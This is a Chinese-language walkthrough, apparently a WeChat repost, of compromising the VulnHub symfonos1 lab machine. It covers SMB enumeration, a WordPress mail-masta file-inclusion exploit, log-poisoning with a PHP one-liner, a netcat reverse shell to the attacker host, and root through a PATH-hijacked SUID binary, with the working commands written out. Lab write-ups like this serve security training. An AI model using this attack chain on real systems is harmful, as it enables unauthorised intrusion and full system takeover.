本周实践的是vulnhub的symfonos1镜像,
下载地址,https://download.vulnhub.com/symfonos/symfonos1.7z,
用workstation导入成功,
做地址扫描,sudo netdiscover -r 192.168.88.0/24,
获取到靶机地址是192.168.88.136,
接着做端口扫描,sudo nmap -sS -sV -T5 -A -p- 192.168.88.136,
发现靶机开了25端口的mail服务、80端口的web服务、139/445端口的smb服务,
对smb服务进行扫描,enum4linux 192.168.88.136,
获取到anonymous和helios共享目录,
访问anonymous,smbclient //192.168.88.136/anonymous,
查看共享文件,获取到几个可能用到的密码,
用上面获取到密码qwerty访问helios共享目录,
smbclient --user=helios //192.168.88.136/helios --password=qwerty,查看共享文件,获取到web服务路径/h3l105,
浏览器访问http://192.168.88.136/h3l105,
获取到web服务是wordpress应用,
在kali攻击机上给靶机地址做个静态域名记录,symfonos.local,
对wordpress进行扫描,
wpscan --url http://symfonos.local/h3l105 --enumerate p,
获取到有mail-masta 1.0的插件,
搜索到用文件包含漏洞,
继续搜索到漏洞利用方法,
浏览器访问http://192.168.88.136/h3l105/wp-content/plugins/mail-masta/inc/campaign/count_of_send.php?pl=/etc/passwd,
telnet 192.168.88.136 25,给mail的日志注入一句话木马,
浏览器访问http://192.168.88.136/h3l105/wp-content/plugins/mail-masta/inc/campaign/count_of_send.php?pl=/var/mail/helios&cmd=id,
kali攻击机上开个反弹shell监听,nc -lvp 4444,
浏览器访问http://192.168.88.136/h3l105/wp-content/plugins/mail-masta/inc/campaign/count_of_send.php?pl=/var/mail/helios&cmd=nc -e /bin/sh 192.168.88.131 4444,
获取到反弹shell,
转成交互式shell,python -c 'import pty; pty.spawn("/bin/sh")',
查找root权限程序,find / -perm -u=s -type f 2>/dev/null,
获取到/opt/statuscheck,查看/opt/statuscheck,
获取到其执行了curl命令,
制作假的curl命令,以及假的环境变量路径,执行/opt/statuscheck,
获取到新的shell,id确认有root权限,
原文始发于微信公众号(云计算和网络安全技术实践):vulnhub之symfonos1的实践
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论